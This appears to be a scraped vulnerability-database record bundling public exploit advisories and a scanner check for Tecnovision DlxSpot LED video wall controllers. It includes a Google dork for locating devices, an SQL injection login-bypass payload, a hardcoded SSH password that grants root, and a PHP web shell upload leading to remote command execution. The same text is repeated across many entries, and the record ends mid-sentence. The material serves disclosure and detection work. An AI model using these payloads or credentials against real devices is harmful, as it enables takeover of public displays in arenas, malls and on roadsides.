ID PACKETSTORM:144257 Type packetstorm Reporter Simon Brannstrom Modified 2017-09-19T00:00:00
Description
`# Exploit Title: DlxSpot - Player4 LED video wall - Admin Interface SQL
Injection
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Authors Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: >1.5.10
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED Video Walls
all over the world, they are used in football arenas, concert halls,
shopping malls, as roadsigns etc.
# CVE: CVE-2017-12930
# Linked CVE's: CVE-2017-12928, CVE-2017-12929
# Visit my github page at
https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md
for complete takeover of the box, from SQLi to full root access.
###############################################################################################################################
DlxSpot Player 4 above version 1.5.10 suffers from an SQL injection
vulnerability in the admin interface login and is exploitable the following
way:
username:admin
password:x' or 'x'='x
TIMELINE:
2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer
homepage.
2017-06-01 - No response, tried contacting again through several contact
forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)
requesting CVE assignment.
2017-08-17 - Three CVE's assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an
email in Italian to the company.
2017-09-18 - No response, full public disclosure.
`
{"id": "PACKETSTORM:144257", "type": "packetstorm", "bulletinFamily": "exploit", "title": "DlxSpot SQL Injection", "description": "", "published": "2017-09-19T00:00:00", "modified": "2017-09-19T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/144257/DlxSpot-SQL-Injection.html", "reporter": "Simon Brannstrom", "references": [], "cvelist": ["CVE-2017-12929", "CVE-2017-12928", "CVE-2017-12930"], "lastseen": "2017-09-19T19:53:40", "viewCount": 13, "enchantments": {"score": {"value": 5.3, "vector": "NONE", "modified": "2017-09-19T19:53:40", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-12930", "CVE-2017-12929", "CVE-2017-12928"]}, {"type": "exploitdb", "idList": ["EDB-ID:42753", "EDB-ID:42755", "EDB-ID:42754"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144259", "PACKETSTORM:144258"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:4160A7748EC28B6269B314A42581D5D0", "EXPLOITPACK:42AF05F836837DCC32B27C2BE8AA6CBB", "EXPLOITPACK:C3CA3BDA0179A90B3996590A122FABCD"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310140378"]}, {"type": "zdt", "idList": ["1337DAY-ID-28588", "1337DAY-ID-28587", "1337DAY-ID-28586"]}], "modified": "2017-09-19T19:53:40", "rev": 2}, "vulnersScore": 5.3}, "sourceHref": "https://packetstormsecurity.com/files/download/144257/dlxspot-sql.txt", "sourceData": "`# Exploit Title: DlxSpot - Player4 LED video wall - Admin Interface SQL \nInjection \n# Google Dork: \"DlxSpot - Player4\" \n# Date: 2017-05-14 \n# Discoverer: Simon Brannstrom \n# Authors Website: https://unknownpwn.github.io/ \n# Vendor Homepage: http://www.tecnovision.com/ \n# Software Link: n/a \n# Version: >1.5.10 \n# Tested on: Linux \n# About: DlxSpot is the software controlling Tecnovision LED Video Walls \nall over the world, they are used in football arenas, concert halls, \nshopping malls, as roadsigns etc. \n# CVE: CVE-2017-12930 \n# Linked CVE's: CVE-2017-12928, CVE-2017-12929 \n \n# Visit my github page at \nhttps://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md \nfor complete takeover of the box, from SQLi to full root access. \n############################################################################################################################### \n \nDlxSpot Player 4 above version 1.5.10 suffers from an SQL injection \nvulnerability in the admin interface login and is exploitable the following \nway: \n \nusername:admin \npassword:x' or 'x'='x \n \nTIMELINE: \n2017-05-14 - Discovery of vulnerabilities. \n2017-05-15 - Contacted Tecnovision through contact form on manufacturer \nhomepage. \n2017-06-01 - No response, tried contacting again through several contact \nforms on homepage. \n2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) \nrequesting CVE assignment. \n2017-08-17 - Three CVE's assigned for the vulnerabilities found. \n2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an \nemail in Italian to the company. \n2017-09-18 - No response, full public disclosure. \n`\n"}
{"cve": [{"lastseen": "2021-02-02T06:36:35", "description": "Arbitrary File Upload in resource.php of TecnoVISION DLX Spot Player4 version >1.5.10 allows remote authenticated users to upload arbitrary files leading to Remote Command Execution.", "edition": 4, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-21T16:29:00", "title": "CVE-2017-12929", "type": "cve", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12929"], "modified": "2017-09-29T15:55:00", "cpe": ["cpe:/a:tecnovision:dlx_spot_player4:-"], "id": "CVE-2017-12929", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12929", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:tecnovision:dlx_spot_player4:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:35", "description": "SQL Injection in the admin interface in TecnoVISION DLX Spot Player4 version >1.5.10 allows remote unauthenticated users to access the web interface as administrator via a crafted password.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-21T16:29:00", "title": "CVE-2017-12930", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12930"], "modified": "2017-09-29T14:23:00", "cpe": ["cpe:/a:tecnovision:dlx_spot_player4:-"], "id": "CVE-2017-12930", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12930", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:tecnovision:dlx_spot_player4:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:35", "description": "A hard-coded password of tecn0visi0n for the dlxuser account in TecnoVISION DLX Spot Player4 (all known versions) allows remote attackers to log in via SSH and escalate privileges to root access with the same credentials.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-21T16:29:00", "title": "CVE-2017-12928", "type": "cve", "cwe": ["CWE-798"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12928"], "modified": "2017-09-29T13:52:00", "cpe": ["cpe:/a:tecnovision:dlx_spot_player4:-"], "id": "CVE-2017-12928", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12928", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:tecnovision:dlx_spot_player4:-:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2017-09-19T19:53:40", "description": "", "published": "2017-09-19T00:00:00", "type": "packetstorm", "title": "DlxSpot Hardcoded Password", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12929", "CVE-2017-12928", "CVE-2017-12930"], "modified": "2017-09-19T00:00:00", "id": "PACKETSTORM:144259", "href": "https://packetstormsecurity.com/files/144259/DlxSpot-Hardcoded-Password.html", "sourceData": "`# Exploit Title: DlxSpot - Player4 LED video wall - Hardcoded Root SSH \nPassword. \n# Google Dork: \"DlxSpot - Player4\" \n# Date: 2017-05-14 \n# Discoverer: Simon Brannstrom \n# Authors Website: https://unknownpwn.github.io/ \n# Vendor Homepage: http://www.tecnovision.com/ \n# Software Link: n/a \n# Version: All known versions \n# Tested on: Linux \n# About: DlxSpot is the software controlling Tecnovision LED Video Walls \nall over the world, they are used in football arenas, concert halls, \nshopping malls, as roadsigns etc. \n# CVE: CVE-2017-12928 \n# Linked CVE's: CVE-2017-12929, CVE-2017-12930 \n \n# Visit my github page at \nhttps://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md \nfor complete takeover of the box, from SQLi to root access. \n############################################################################################################################### \n \nHardcoded password for all dlxspot players, login with the following \ncredentials via SSH \n \nusername: dlxuser \npassword: tecn0visi0n \n \nEscalate to root with the same password. \n \nTIMELINE: \n2017-05-14 - Discovery of vulnerabilities. \n2017-05-15 - Contacted Tecnovision through contact form on manufacturer \nhomepage. \n2017-06-01 - No response, tried contacting again through several contact \nforms on homepage. \n2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) \nrequesting CVE assignment. \n2017-08-17 - Three CVE's assigned for the vulnerabilities found. \n2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an \nemail in Italian to the company. \n2017-09-18 - No response, full public disclosure. \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/144259/dlxspot-hardcoded.txt"}, {"lastseen": "2017-09-19T19:53:40", "description": "", "published": "2017-09-19T00:00:00", "type": "packetstorm", "title": "DlxSpot Shell Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12929", "CVE-2017-12928", "CVE-2017-12930"], "modified": "2017-09-19T00:00:00", "id": "PACKETSTORM:144258", "href": "https://packetstormsecurity.com/files/144258/DlxSpot-Shell-Upload.html", "sourceData": "`# Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload \nto RCE \n# Google Dork: \"DlxSpot - Player4\" \n# Date: 2017-05-14 \n# Discoverer: Simon Brannstrom \n# Authors Website: https://unknownpwn.github.io/ \n# Vendor Homepage: http://www.tecnovision.com/ \n# Software Link: n/a \n# Version: >1.5.10 \n# Tested on: Linux \n# About: DlxSpot is the software controlling Tecnovision LED Video Walls \nall over the world, they are used in football arenas, concert halls, \nshopping malls, as roadsigns etc. \n# CVE: CVE-2017-12929 \n# Linked CVE's: CVE-2017-12928, CVE-2017-12930. \n \n# Visit my github page at \nhttps://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md \nfor complete takeover of the box, from SQLi to root access. \n############################################################################################################################### \n \nArbitrary File Upload leading to Remote Command Execution: \n \n1. Visit http://host/resource.php and upload PHP shell. For example: <?php \nsystem($_GET[\"c\"]); ?> \n2. RCE via http://host/resource/source/shell.php?c=id \n3. Output: www-data \n \nTIMELINE: \n2017-05-14 - Discovery of vulnerabilities. \n2017-05-15 - Contacted Tecnovision through contact form on manufacturer \nhomepage. \n2017-06-01 - No response, tried contacting again through several contact \nforms on homepage. \n2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) \nrequesting CVE assignment. \n2017-08-17 - Three CVE's assigned for the vulnerabilities found. \n2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an \nemail in Italian to the company. \n2017-09-18 - No response, full public disclosure. \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/144258/dlxspot-shell.txt"}], "exploitdb": [{"lastseen": "2017-09-19T15:00:11", "description": "Tecnovision DLX Spot - SSH Backdoor. CVE-2017-12928. Remote exploit for Multiple platform", "published": "2017-05-14T00:00:00", "type": "exploitdb", "title": "Tecnovision DLX Spot - SSH Backdoor", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12929", "CVE-2017-12928", "CVE-2017-12930"], "modified": "2017-05-14T00:00:00", "id": "EDB-ID:42753", "href": "https://www.exploit-db.com/exploits/42753/", "sourceData": "# Exploit Title: DlxSpot - Player4 LED video wall - Hardcoded Root SSH Password.\r\n# Google Dork: \"DlxSpot - Player4\"\r\n# Date: 2017-05-14\r\n# Discoverer: Simon Brannstrom\r\n# Authors Website: https://unknownpwn.github.io/\r\n# Vendor Homepage: http://www.tecnovision.com/\r\n# Software Link: n/a\r\n# Version: All known versions\r\n# Tested on: Linux\r\n# About: DlxSpot is the software controlling Tecnovision LED Video Walls all over the world, they are used in football arenas, concert halls, shopping malls, as roadsigns etc.\r\n# CVE: CVE-2017-12928\r\n# Linked CVE's: CVE-2017-12929, CVE-2017-12930\r\n\r\n# Visit my github page at https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md for complete takeover of the box, from SQLi to root access.\r\n###############################################################################################################################\r\n\r\nHardcoded password for all dlxspot players, login with the following credentials via SSH\r\n\r\nusername: dlxuser\r\npassword: tecn0visi0n\r\n\r\nEscalate to root with the same password.\r\n\r\nTIMELINE:\r\n2017-05-14 - Discovery of vulnerabilities.\r\n2017-05-15 - Contacted Tecnovision through contact form on manufacturer homepage.\r\n2017-06-01 - No response, tried contacting again through several contact forms on homepage.\r\n2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) requesting CVE assignment.\r\n2017-08-17 - Three CVE's assigned for the vulnerabilities found.\r\n2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an email in Italian to the company.\r\n2017-09-18 - No response, full public disclosure.\r\n\r\n DEDICATED TO MARCUS ASTROM\r\nFOREVER LOVED - NEVER FORGOTTEN", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42753/"}, {"lastseen": "2017-09-19T15:00:13", "description": "Tecnovision DLX Spot - Arbitrary File Upload. CVE-2017-12929. Webapps exploit for PHP platform", "published": "2017-05-14T00:00:00", "type": "exploitdb", "title": "Tecnovision DLX Spot - Arbitrary File Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12929", "CVE-2017-12928", "CVE-2017-12930"], "modified": "2017-05-14T00:00:00", "id": "EDB-ID:42755", "href": "https://www.exploit-db.com/exploits/42755/", "sourceData": "# Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload\r\nto RCE\r\n# Google Dork: \"DlxSpot - Player4\"\r\n# Date: 2017-05-14\r\n# Discoverer: Simon Brannstrom\r\n# Authors Website: https://unknownpwn.github.io/\r\n# Vendor Homepage: http://www.tecnovision.com/\r\n# Software Link: n/a\r\n# Version: >1.5.10\r\n# Tested on: Linux\r\n# About: DlxSpot is the software controlling Tecnovision LED Video Walls\r\nall over the world, they are used in football arenas, concert halls,\r\nshopping malls, as roadsigns etc.\r\n# CVE: CVE-2017-12929\r\n# Linked CVE's: CVE-2017-12928, CVE-2017-12930.\r\n\r\n# Visit my github page at\r\nhttps://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md\r\nfor complete takeover of the box, from SQLi to root access.\r\n###############################################################################################################################\r\n\r\nArbitrary File Upload leading to Remote Command Execution:\r\n\r\n1. Visit http://host/resource.php and upload PHP shell. For example: <?php\r\nsystem($_GET[\"c\"]); ?>\r\n2. RCE via http://host/resource/source/shell.php?c=id\r\n3. Output: www-data\r\n\r\nTIMELINE:\r\n2017-05-14 - Discovery of vulnerabilities.\r\n2017-05-15 - Contacted Tecnovision through contact form on manufacturer\r\nhomepage.\r\n2017-06-01 - No response, tried contacting again through several contact\r\nforms on homepage.\r\n2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)\r\nrequesting CVE assignment.\r\n2017-08-17 - Three CVE's assigned for the vulnerabilities found.\r\n2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an\r\nemail in Italian to the company.\r\n2017-09-18 - No response, full public disclosure.\r\n\r\n DEDICATED TO MARCUS ASTROM\r\nFOREVER LOVED - NEVER FORGOTTEN\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42755/"}, {"lastseen": "2017-09-19T15:00:12", "description": "Tecnovision DLX Spot - Authentication Bypass. CVE-2017-12930. Webapps exploit for PHP platform", "published": "2017-05-14T00:00:00", "type": "exploitdb", "title": "Tecnovision DLX Spot - Authentication Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12929", "CVE-2017-12928", "CVE-2017-12930"], "modified": "2017-05-14T00:00:00", "id": "EDB-ID:42754", "href": "https://www.exploit-db.com/exploits/42754/", "sourceData": "# Exploit Title: DlxSpot - Player4 LED video wall - Admin Interface SQL\r\nInjection\r\n# Google Dork: \"DlxSpot - Player4\"\r\n# Date: 2017-05-14\r\n# Discoverer: Simon Brannstrom\r\n# Authors Website: https://unknownpwn.github.io/\r\n# Vendor Homepage: http://www.tecnovision.com/\r\n# Software Link: n/a\r\n# Version: >1.5.10\r\n# Tested on: Linux\r\n# About: DlxSpot is the software controlling Tecnovision LED Video Walls\r\nall over the world, they are used in football arenas, concert halls,\r\nshopping malls, as roadsigns etc.\r\n# CVE: CVE-2017-12930\r\n# Linked CVE's: CVE-2017-12928, CVE-2017-12929\r\n\r\n# Visit my github page at\r\nhttps://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md\r\nfor complete takeover of the box, from SQLi to full root access.\r\n###############################################################################################################################\r\n\r\nDlxSpot Player 4 above version 1.5.10 suffers from an SQL injection\r\nvulnerability in the admin interface login and is exploitable the following\r\nway:\r\n\r\nusername:admin\r\npassword:x' or 'x'='x\r\n\r\nTIMELINE:\r\n2017-05-14 - Discovery of vulnerabilities.\r\n2017-05-15 - Contacted Tecnovision through contact form on manufacturer\r\nhomepage.\r\n2017-06-01 - No response, tried contacting again through several contact\r\nforms on homepage.\r\n2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)\r\nrequesting CVE assignment.\r\n2017-08-17 - Three CVE's assigned for the vulnerabilities found.\r\n2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an\r\nemail in Italian to the company.\r\n2017-09-18 - No response, full public disclosure.\r\n\r\n DEDICATED TO MARCUS ASTROM\r\nFOREVER LOVED - NEVER FORGOTTEN\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42754/"}], "openvas": [{"lastseen": "2020-04-16T16:33:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12929", "CVE-2017-12928", "CVE-2017-12930"], "description": "Tecnovison DlxSpot is prone to multiple vulnerabilities:\n\n - Hardcoded Root SSH Password (CVE-2017-12928)\n\n - Arbitrary File Upload to RCE (CVE-2017-12929)\n\n - Admin Interface SQL Injection (CVE-2017-12930)", "modified": "2020-04-12T00:00:00", "published": "2017-09-20T00:00:00", "id": "OPENVAS:1361412562310140378", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140378", "type": "openvas", "title": "Tecnovision DlxSpot Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Tecnovision DlxSpot Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:tecnovision:dlxspot\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140378\");\n script_version(\"2020-04-12T08:18:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-12 08:18:11 +0000 (Sun, 12 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-20 13:15:09 +0700 (Wed, 20 Sep 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-12928\", \"CVE-2017-12929\", \"CVE-2017-12930\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_name(\"Tecnovision DlxSpot Multiple Vulnerabilities\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_dlxspot_web_detect.nasl\");\n script_mandatory_keys(\"dlxspot/installed\");\n\n script_tag(name:\"summary\", value:\"Tecnovison DlxSpot is prone to multiple vulnerabilities:\n\n - Hardcoded Root SSH Password (CVE-2017-12928)\n\n - Arbitrary File Upload to RCE (CVE-2017-12929)\n\n - Admin Interface SQL Injection (CVE-2017-12930)\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted HTTP POST request and checks the response.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability.\n Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the\n product or replace the product by another one.\");\n\n script_xref(name:\"URL\", value:\"https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nurl = \"/verify.php\";\n\ndata = 'loginusername=admin&loginpassword=x%27+or+%27x%27%3D%27x&save=+LOGIN+';\n\nreq = http_post_put_req(port: port, url: url, data: data,\n add_headers: make_array(\"Content-Type\", \"application/x-www-form-urlencoded\"));\nres = http_keepalive_send_recv(port: port, data: req);\n\nif ('src=\"playlist.php\"' >< res && \"<title>Dlxplayer</title>\" >< res) {\n report = \"It was possible to log in as admin by conducting an SQL injection.\";\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:51", "description": "\nTecnovision DLX Spot - Arbitrary File Upload", "edition": 1, "published": "2017-05-19T00:00:00", "title": "Tecnovision DLX Spot - Arbitrary File Upload", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12929", "CVE-2017-12928", "CVE-2017-12930"], "modified": "2017-05-19T00:00:00", "id": "EXPLOITPACK:42AF05F836837DCC32B27C2BE8AA6CBB", "href": "", "sourceData": "# Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload\nto RCE\n# Google Dork: \"DlxSpot - Player4\"\n# Date: 2017-05-14\n# Discoverer: Simon Brannstrom\n# Authors Website: https://unknownpwn.github.io/\n# Vendor Homepage: http://www.tecnovision.com/\n# Software Link: n/a\n# Version: >1.5.10\n# Tested on: Linux\n# About: DlxSpot is the software controlling Tecnovision LED Video Walls\nall over the world, they are used in football arenas, concert halls,\nshopping malls, as roadsigns etc.\n# CVE: CVE-2017-12929\n# Linked CVE's: CVE-2017-12928, CVE-2017-12930.\n\n# Visit my github page at\nhttps://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md\nfor complete takeover of the box, from SQLi to root access.\n###############################################################################################################################\n\nArbitrary File Upload leading to Remote Command Execution:\n\n1. Visit http://host/resource.php and upload PHP shell. For example: <?php\nsystem($_GET[\"c\"]); ?>\n2. RCE via http://host/resource/source/shell.php?c=id\n3. Output: www-data\n\nTIMELINE:\n2017-05-14 - Discovery of vulnerabilities.\n2017-05-15 - Contacted Tecnovision through contact form on manufacturer\nhomepage.\n2017-06-01 - No response, tried contacting again through several contact\nforms on homepage.\n2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)\nrequesting CVE assignment.\n2017-08-17 - Three CVE's assigned for the vulnerabilities found.\n2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an\nemail in Italian to the company.\n2017-09-18 - No response, full public disclosure.\n\n DEDICATED TO MARCUS ASTROM\nFOREVER LOVED - NEVER FORGOTTEN", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:51", "description": "\nTecnovision DLX Spot - SSH Backdoor Access", "edition": 1, "published": "2017-05-19T00:00:00", "title": "Tecnovision DLX Spot - SSH Backdoor Access", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12929", "CVE-2017-12928", "CVE-2017-12930"], "modified": "2017-05-19T00:00:00", "id": "EXPLOITPACK:4160A7748EC28B6269B314A42581D5D0", "href": "", "sourceData": "# Exploit Title: DlxSpot - Player4 LED video wall - Hardcoded Root SSH Password.\n# Google Dork: \"DlxSpot - Player4\"\n# Date: 2017-05-14\n# Discoverer: Simon Brannstrom\n# Authors Website: https://unknownpwn.github.io/\n# Vendor Homepage: http://www.tecnovision.com/\n# Software Link: n/a\n# Version: All known versions\n# Tested on: Linux\n# About: DlxSpot is the software controlling Tecnovision LED Video Walls all over the world, they are used in football arenas, concert halls, shopping malls, as roadsigns etc.\n# CVE: CVE-2017-12928\n# Linked CVE's: CVE-2017-12929, CVE-2017-12930\n\n# Visit my github page at https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md for complete takeover of the box, from SQLi to root access.\n###############################################################################################################################\n\nHardcoded password for all dlxspot players, login with the following credentials via SSH\n\nusername: dlxuser\npassword: tecn0visi0n\n\nEscalate to root with the same password.\n\nTIMELINE:\n2017-05-14 - Discovery of vulnerabilities.\n2017-05-15 - Contacted Tecnovision through contact form on manufacturer homepage.\n2017-06-01 - No response, tried contacting again through several contact forms on homepage.\n2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) requesting CVE assignment.\n2017-08-17 - Three CVE's assigned for the vulnerabilities found.\n2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an email in Italian to the company.\n2017-09-18 - No response, full public disclosure.\n\n DEDICATED TO MARCUS ASTROM\nFOREVER LOVED - NEVER FORGOTTEN", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:51", "description": "\nTecnovision DLX Spot - Authentication Bypass", "edition": 1, "published": "2017-05-19T00:00:00", "title": "Tecnovision DLX Spot - Authentication Bypass", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12929", "CVE-2017-12928", "CVE-2017-12930"], "modified": "2017-05-19T00:00:00", "id": "EXPLOITPACK:C3CA3BDA0179A90B3996590A122FABCD", "href": "", "sourceData": "# Exploit Title: DlxSpot - Player4 LED video wall - Admin Interface SQL\nInjection\n# Google Dork: \"DlxSpot - Player4\"\n# Date: 2017-05-14\n# Discoverer: Simon Brannstrom\n# Authors Website: https://unknownpwn.github.io/\n# Vendor Homepage: http://www.tecnovision.com/\n# Software Link: n/a\n# Version: >1.5.10\n# Tested on: Linux\n# About: DlxSpot is the software controlling Tecnovision LED Video Walls\nall over the world, they are used in football arenas, concert halls,\nshopping malls, as roadsigns etc.\n# CVE: CVE-2017-12930\n# Linked CVE's: CVE-2017-12928, CVE-2017-12929\n\n# Visit my github page at\nhttps://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md\nfor complete takeover of the box, from SQLi to full root access.\n###############################################################################################################################\n\nDlxSpot Player 4 above version 1.5.10 suffers from an SQL injection\nvulnerability in the admin 